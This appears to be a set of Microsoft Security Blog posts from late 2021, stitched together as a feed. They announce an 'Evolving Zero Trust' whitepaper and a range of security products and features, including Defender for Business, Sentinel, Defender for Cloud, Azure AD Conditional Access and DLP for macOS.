1. What’s Driving the Surge in Ransomware Attacks? Matt Stieb, Intelligencer, 7 September 2021.

2. 2021 has broken the record for zero-day hacking attacks, Patrick Howell O’Neill, MIT Technology Review, 23 September 2021.

The post Discover what’s new and gain technical expertise from MISA at Ignite appeared first on Microsoft Security Blog.

Evolving Zero Trust—Lessons learned and emerging trends

November 3rd, 2021 No comments

Looking back at the last two years, to say that our security strategies have evolved would be an understatement. Organizations around the world made overnight transitions to remote work models in response to a global pandemic, forcing them to reassess attack surface areas as they underwent an accelerated digital transformation. Meanwhile, cybercriminals seized new opportunities—introducing COVID-19-themed social engineering campaigns and accelerated ransomware attacks. Nation-state actors launched increasingly bold and sophisticated nation-state attacks.1

In this environment, security transformation has become key to survival. The mandate to explicitly verify every access request, focus on least privilege access overall, and constantly assume breach to maintain vigilance was made clear, as exemplified by calls from governments and businesses worldwide to accelerate the adoption of Zero Trust strategies.

Sidebar: Zero Trust is a proactive, integrated approach to security across all layers of the digital estate that explicitly and continuously verifies every transaction, asserts least privilege, and relies on intelligence, advanced detection, and real-time response to threats.

The evolution of Zero Trust

Microsoft has embraced Zero Trust to defend our own estate and as a guiding principle for the development of our products. We have also helped thousands of our customers, including Siemens, deploy Zero Trust strategies, accelerate their digital transformation, and cope with the increasing frequency of advanced attacks using our Zero Trust architecture.

Microsoft Security's Zero Trust architecture flow chart depicting lessons learned from thousands of Zero Trust deployments.

Figure 1: Learnings across thousands of Zero Trust deployments have informed our Zero Trust architecture, which emphasizes the critical importance of integrating policy enforcement and automation, threat intelligence, and threat protection across security pillars.

Lessons learned and emerging trends

Today, we’re publishing the new whitepaper, Evolving Zero Trust, to share the key lessons we’ve learned by embracing Zero Trust at Microsoft and supporting thousands of organizations in their Zero Trust deployments. These lessons inform our view of how Zero Trust implementations need to evolve to keep organizations protected. We’re also sharing the evolution of our recommended Zero Trust architecture and maturity model, which has been informed by these insights.

Highlights from the paper include:

Cover page of Microsoft Security's new whitepaper, Evolving Zero Trust.

  • Lessons from the most successful organizations: The last couple of years have reinforced the importance of applying Zero Trust comprehensively across the digital estate. Organizations that were furthest along in their journeys were more resilient against sophisticated attacks, improved user experiences, and reduced implementation and management costs. We also saw that successful organizations doubled down on automation and a robust Zero Trust governance strategy—both of which can improve security posture and time to remediation while reducing the workload on scarce security personnel.
  • Emerging industry trends: Zero Trust is a dynamic security model that continues to evolve to meet current threats and business realities. Going forward, we will see deeper integration of Zero Trust across pillars—leading to simplified policy automation, more advanced and intelligent threat detection, and more comprehensive attack mitigation. We also predict a wider adoption of the principles behind Zero Trust—verify explicitly, enforce least privilege access, and assume breach—to include the tools and processes used to develop applications, the hybrid and multi-cloud environments in which they run, as well as the applications themselves.
  • A more connected Zero Trust architecture: The learnings highlighted above led us to refine our Zero Trust architecture to place more emphasis on the critical importance of capturing telemetry from across the environment to inform policy decisions, provide better threat intelligence, measure the user experience, and more. The updated architecture showcases the importance of integrating policy enforcement and automation, threat intelligence, and threat protection across security pillars.

This document showcases the incredible evolution and acceleration in the adoption of Zero Trust security strategies. Just a few years ago, Zero Trust was merely a new buzzword for many organizations. Today, 76 percent of large organizations have adopted a Zero Trust approach. We hope that the lessons, trends, and positions we shared in this document are helpful in the planning and application of your own Zero Trust strategy.

The insights and actionable learnings in this document have been provided by a diverse group of customers, partners, and security-focused individuals working across applications, data, endpoint management, identity, infrastructure, networking, threat protection, and our own internal security organization. I’d like to thank our customers and partners for their expertise and insights, as well as my colleagues for their contributions to this whitepaper, architecture, and maturity model guidance.

Learn More

Get the complete Zero Trust whitepaper for key insights, Zero Trust architecture, and a maturity model to help accelerate your adoption.

For a repository of technical resources to help accelerate the deployment and integration of Zero Trust across all security pillars, visit the Zero Trust Guidance Center.

Use the Zero Trust Assessment tool to evaluate your Zero Trust security posture, maturity, and receive practical recommendations to help reach key milestones.

Read the 2021 Microsoft Digital Defense Report (MDDR) for in-depth findings about Microsoft’s tracking of nation-state threat groups, specific threat actors, attack methods, and more.

To learn more about Zero Trust, visit Microsoft Security’s Zero Trust website.

To learn more about Microsoft Security solutions, visit our website. Bookmark the Security blog to keep up with our expert coverage on security matters. Also, follow us at @MSFTSecurity for the latest news and updates on cybersecurity.

 


1. Microsoft Digital Defense Report shares new insights on nation-state attacks, John Lambert, Microsoft, 25 October 2021.

The post Evolving Zero Trust—Lessons learned and emerging trends appeared first on Microsoft Security Blog.


Protect your business with Microsoft Security’s comprehensive protection

November 2nd, 2021 No comments

Securing an organization has never been simple. But over the past year, we’ve seen significant changes in the threat landscape that are having a major impact on organizations of every size in every sector. The frequency and sophistication of cyber events have increased significantly. We see headlines every day now of phishing schemes and ransomware attacks. Organizations and agencies that were once considered “off-limits,” like critical infrastructure or healthcare organizations, are now being targeted by bad actors, adding risk to human life.

And with hybrid work here to stay, the attack surface has expanded as personal devices become an essential part of the corporate network. Many security teams I speak with have been shifting their strategy to increase business resilience and, smartly, many have adopted a Zero Trust approach. I am so inspired by the fearlessness I see in these teams. They work tirelessly and confidently behind the scenes to protect their people and their organization from harm. With these superheroes in mind, I have exciting news to share today about how Microsoft Security provides the most comprehensive approach to security, enabling organizations of every size to be fearless as they grow, create, and innovate.

Protection for everyone

Cyber attackers do not discriminate; small businesses are just as susceptible as large enterprises. But based on our research, almost 60 percent of small and medium businesses said they didn’t feel equipped to maintain cybersecurity hygiene, citing insufficient resources and lack of specialized security skills.1 Today, we’re announcing Microsoft Defender for Business, which will enter public preview later this month and has been specifically built to bring the power of enterprise-grade endpoint security to small and medium businesses with up to 300 employees.

Small and medium businesses will be empowered to elevate their security by moving from traditional antivirus to next-generation protection, endpoint detection and response, and threat and vulnerability management—all while taking advantage of simplified setup and management. Defender for Business will be available both as a standalone solution and as integrated protection included within Microsoft 365 Business Premium. Additionally, Defender for Business also works with Microsoft 365 Lighthouse—so, IT service providers can add this powerful endpoint protection to their multi-customer view of security events. Learn more about Microsoft Defender for Business in today’s blog post.

Microsoft was recently announced as a leader in the Forrester XDR Wave™: Extended Detection and Response (XDR), Q4, 2021.2 We continue to innovate to bring the best of SIEM and XDR together to empower defenders with an integrated toolset and rich security intelligence:

  • Microsoft Sentinel (formerly Azure Sentinel) now offers more than 100 solutions for data collection in a new content hub for easy discovery and deployment. We’re expanding Fusion’s capabilities to identify previously unknown threats, integrating with Microsoft Azure Synapse to tap into the power of big data analytics, and introducing a new free trial. Learn more about Microsoft Sentinel.
  • Microsoft Defender for Cloud Apps (formerly Microsoft Cloud App Security) now adds a new application governance capability, generally available today. App governance provides security and policy management to help identify, alert, and protect against risky behavior across data, users, and applications. Additionally, Defender for Cloud Apps has extended its app coverage, now including security for more than 26,000 cloud applications and covering all major cloud app use cases. Learn more in today’s blog post.
  • Microsoft Defender for IoT (formerly Azure Defender for IoT), our agentless solution, is now integrated with Microsoft 365 Defender to bring IoT protection into the same workflow as the rest of your XDR. Additionally, it can now discover and secure enterprise IoT devices, which are ideal targets for attackers since they are often unpatched, misconfigured, and unmonitored. These updates enable Defender for IoT to provide unified protection for both enterprise IoT and operational technology (OT) devices used in critical industries like oil and gas. Learn more here.
  • Azure Active Directory (Azure AD) Identity Protection now includes token theft detection, one-click enablement for risk data extensibility, and a built-in workbook to help detect and remediate identity-based threats. Learn more in today’s blog post.

Secure and trusted collaboration

We’re living through unprecedented growth of digital interactions. In this boundaryless digital ecosystem, trust between parties needs to be established in real-time. Yet trust is a rare commodity on the internet. In this new world where digital ‘handshakes’ are more common than analog, identity is absolutely fundamental.

At Microsoft, we’re building the identity of the future: a connective network that enables people, organizations, apps, digital services, and smart devices to make real-time access decisions based on a secure, privacy-respecting credentials exchange. Our identity platform will be the means of establishing trust—it will be the trust fabric for the boundaryless digital ecosystem of the future.

This trust fabric is what makes experiences like Microsoft Teams Connect already possible today. Our flexible and dynamic identity platform, Azure AD, underpins Microsoft Teams to help ensure that every access request, whether internal or external, is secured. It makes establishing secure collaboration across organizational boundaries possible. Security leaders can easily establish inter-company trust, and all employees across multiple companies can collaborate as one extended team.

As collaboration flows freely across organizational boundaries, it’s more important than ever to keep both your data and people secure and private. We firmly believe you can have both strong security and seamless collaboration that empower people to do their best work. With the Microsoft cloud, you can establish one information protection and governance policy and it will carry through to the documents people share in Microsoft 365, the data that’s managed by Azure Purview, the user controls in Microsoft Defender for Cloud Apps, and even the apps you build with Microsoft Power Platform. Today, we’re making several announcements that expand these capabilities:

  • We’re broadening Azure confidential computing to help organizations meet their data privacy and security needs by protecting data-in-use for added security and multi-party computation. Trusted launch is generally available for all Gen2 virtual machines in Azure, and we’re extending our capabilities by partnering with AMD and Intel to offer confidential virtual machines and containers. Learn more about Azure confidential computing.
  • We’re extending the co-authoring and AutoSave capabilities beyond the web and into the desktop Microsoft 365 apps to further enhance real-time collaboration and productivity. Multiple users can now be co-authors on a Word, Excel, or PowerPoint document simultaneously with auto-save—so, you don’t have to choose between information encryption and team collaboration. Learn more here.
  • Insider Risk Management is adding a healthcare playbook with built-in indicators and a customizable machine learning template in public preview. The new playbook connects into Epic and other electronic medical records solutions to help healthcare companies identify potential insider risks related to patient data misuse. Learn more in today’s blog post.
  • To help organizations maintain a positive work culture and a strong commitment to user privacy, Communication Compliance can now analyze content in attachments sent over Teams in addition to traditional text-based messages. To improve the onboarding experience, we’re also introducing Day Zero Insights, now in public preview, to see potential communication risks in your organization without configuring any policies. Learn more in today’s blog post.
  • Microsoft Information Governance is adding the ability to set a retention or deletion policy for cloud attachments. As users often attach files stored in OneDrive and SharePoint to a Teams message, this policy helps organizations ensure they save the version of the file attachment sent with the message. Learn more in today’s blog post.
  • To help customers embrace a Zero Trust approach,Compliance Manager’s data protection baseline assessment now includes additional controls, making it easy to assess, monitor, and improve compliance with our Zero Trust principles and recommendations. Learn more in today’s blog post.
  • Last month, we announced Privacy Management for Microsoft 365 to help our customers proactively identify and prevent privacy risks, manage subject rights requests at scale, and empower employees to make smart data handling decisions. Today, we’re excited to announce Microsoft Priva with Privacy Management for Microsoft 365 as the first Priva solution. We’re committed to helping you build a privacy-resilient workplace and look forward to sharing future Microsoft Priva capabilities.

Protection everywhere

As part of our comprehensive approach to security, we’re committed to helping you protect your whole environment—across clouds, platforms, and devices. Today we’re extending our native Cloud Security Posture Management and Workload Protection capabilities to Amazon Web Services (AWS) within Microsoft Defender for Cloud, formerly known as Azure Security Center and Azure Defender. Defender for Cloud enables you to secure AWS and Azure environments from a single place with the same seamless experience and without any dependency on AWS Security Hub.

In addition to out-of-the-box recommendations that assess your security posture against industry standards and regulatory compliance, we’ve also extended our workload protection capabilities to Amazon Elastic Kubernetes Service (EKS). These enhanced capabilities give security teams unified visibility across their multi-cloud workloads, enabling them to prioritize better with a holistic view of their security state. Learn more from our announcement blog.

Additionally, Microsoft Defender for Cloud now integrates with Azure Purview in public preview, enabling security teams to discover, classify, track, and secure sensitive information across their cloud workloads.

We also continue to expand our platform support on multiple fronts:

  • We’re extending the types of unmanaged devices Microsoft Defender for IoT can discover and monitor to include enterprise IoT devices, such as conferencing systems, Voice over Internet Protocol (VoIP) phones, printers, cameras, and building automation. Learn more about Microsoft Defender for IoT.
  • We’re expanding the breadth of Microsoft Endpoint Manager to include Linux desktops and enabling organizations to deploy security configurations directly to devices with Microsoft Defender for Endpoint. With these new capabilities, Endpoint Manager unifies endpoint configuration, management, and security across Windows, iOS, Android, macOS, and now Linux platforms.
    • With the ability to manage Linux endpoints, organizations can now use Endpoint Manager to configure conditional access from Azure AD specifically for Linux users. Learn more here.
    • Devices that have Defender for Endpoint and are not managed by Endpoint Manager can now be configured to receive security configurations directly without full device enrollment. This enables a single configuration surface in Endpoint Manager across device platforms, regardless of the management platform in use on the device. Learn more here.
  • We’re making Conditional Access policies in Azure AD more granular, more extensible, and easier to deploy. Learn more in today’s blog post.
    • Azure AD Conditional Access now includes new granular access controls with device and application filters, a new dashboard with a comprehensive view of Conditional Access policy gaps and coverage, and pre-built templates for recommended policies. It can now also be applied to workload identities.
    • Azure AD Continuous Access Evaluation extends Conditional Access into each access session. Instead of applying policy just at the point of entry, it enforces policies in near real-time whenever a new threat is detected.
  • Today, we’re extending the support for Microsoft’s Unified Data Loss Prevention (DLP) offering to include macOS. You can now identify sensitive information used on macOS devices and enforce a DLP policy to prevent it from being inappropriately shared, transferred, or used. Learn more in today’s blog post.
  • Additionally, we’re extending the support for our Insider Risk Management offering to include macOS. On macOS devices you can now leverage enhanced machine learning models to detect potential insider risk activities, such as the exfiltration of sensitive data by printing it, uploading it to a network or cloud location, or copying it to a USB device. Learn more here.

Be fearless

Inspired by the fearlessness we see in the communities we serve, we’re committed to helping our customers strengthen their security posture and build resilience. As such, we’re proud to accelerate our security investments, including acquisitions such as CloudKnox3 and RiskIQ.4 And we’ve pledged to invest $20 billion globally in security research and development over the next five years. These investments will help drive continued innovation in the tools defenders need to tip the scales in their favor.

Cybersecurity is a mission of great importance and true urgency. In today’s environment, it requires a comprehensive approach that includes security, compliance, identity, management, and privacy. At Microsoft, we believe that translates into more than just end-to-end solutions; it’s about constantly innovating to better serve our customers’ needs and the requirements of the landscape we all face. It’s about being best in breed, providing the most actionable intelligence, and delivering an integrated and simplified experience. In short, it’s about empowering people and organizations to do more, securely. Learn more about how you can take advantage of Microsoft Security’s comprehensive protection.

To learn more about Microsoft Security solutions, visit our website. Bookmark the Security blog to keep up with our expert coverage on security matters. Also, follow us at @MSFTSecurity for the latest news and updates on cybersecurity.

1Your Security Posture Is Lacking: Time For An Adjustment, a commissioned study conducted by Forrester Consulting on behalf of Microsoft, 2020.

2Microsoft achieves a Leader placement in Forrester Wave for XDR, Rob Lefferts, Microsoft. 18 October 2021.

3Microsoft acquires CloudKnox Security to offer unified privileged access and cloud entitlement management, Microsoft Security Team, Microsoft. 21 July 2021.

4Microsoft acquired RiskIQ to strengthen cybersecurity of digital transformation and hybrid work, Eric Doerr, Microsoft. 12 July 2021.

The post Protect your business with Microsoft Security’s comprehensive protection appeared first on Microsoft Security Blog.
